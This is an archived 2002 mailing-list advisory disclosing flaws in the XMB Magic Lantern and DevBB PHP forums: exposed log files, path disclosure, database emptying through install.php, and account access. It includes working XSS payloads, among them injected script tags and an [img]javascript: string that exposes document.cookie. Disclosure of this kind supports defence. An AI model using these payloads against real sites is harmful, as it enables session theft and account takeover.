Vulnerability Development mailing list archives
Security holes : XMB Magic Lantern forum & DevBB
From: frog frog <leseulfrog () hotmail com>
Date: 11 May 2002 13:49:06 -0000
Hi all :) Product 1 : *********** XMB Magic Lantern forum 1.6b final http://www.xmbforum.com http://www.aventure-media.co.uk Problems : - Reading of logs files - XSS - Path Disclosure - Access to users/admins accounts - Logs distortion Exploits : - /index_log.log - /cplogfile.log - If index_log not chmod 777 => index_add.php - index.php?analized=huhu - member.php?action=viewpro&member=<fo*rm%20name=o><input% 20name=u%20value=XSS></for*m><scri*pt>alert (document.o.u.value)</scri*pt> (without '*' ) - [img]javascript:alert('hop'+document.cookie)[/img] - [img]" onerror="alert('hum')" width="0[/img] - member.php?action=reg&username=%253Cscript%253E&... - ... Product 2 : *********** DevBB 1.0 final http://www.mybboard.com Problems : - DB emptying - XSS - Reading of logs files - Access to users/admins accounts Exploits : - /admin/cplogfile.log - /install.php - ... More details : in french : http://www.ifrance.com/kitetoua/tuto/xmbml-devbb.txt translated by google : http://translate.google.com/translate? u=http://www.ifrance.com/kitetoua/tuto/xmbml- devbb.txt&langpair=fr|en&hl=fr&ie=ASCII&oe=ASCII As usual, sorry for my bad english :) frog-m@n
Current thread:
- Security holes : XMB Magic Lantern forum & DevBB frog frog (May 11)